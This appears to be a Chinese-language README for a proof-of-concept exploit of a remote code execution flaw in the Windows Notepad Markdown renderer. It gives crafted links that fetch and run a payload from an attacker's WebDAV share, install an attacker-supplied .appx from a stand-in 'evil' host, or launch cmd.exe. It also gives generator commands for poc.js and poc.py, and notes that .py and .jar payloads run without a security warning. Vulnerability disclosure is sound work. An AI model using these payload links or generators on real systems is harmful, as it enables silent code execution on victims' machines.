针对 Windows 记事本 Markdown 渲染器中远程代码执行漏洞的概念验证(PoC)。该 Markdown 引擎未限制 URL 协议,允许通过可点击链接触发任意协议处理器。
file:///)[click](file:///\\attacker@5005\DavWWWRoot\payload.py)
file:/// 协议可解析远程 UNC 路径。链接一个载荷,Windows 将在点击时获取并执行它。
ms-appinstaller://)[click](ms-appinstaller://?source=https://evil/xxx.appx)
使用攻击者提供的 .appx/.msix 包打开应用安装程序。
file://)[click](file://C:/windows/system32/cmd.exe)
启动磁盘上已有的任何可执行文件 — cmd.exe、powershell.exe、mshta.exe 等。
两个脚本都会在当前目录生成一个包含构造链接的 poc.md 文件。
node poc.js <host> <port> <payload/path>
python poc.py <host> <port> <payload/path>
# 示例
node poc.js 192.168.1.100 5005 hello.py
notepad poc.md
测试载荷位于 payloads/ 目录中。
.exe、.lnk、.vbs 及类似扩展名会触发 Windows 安全警告,无论记事本行为如何。.py 和 .jar 文件会静默执行。注意安全!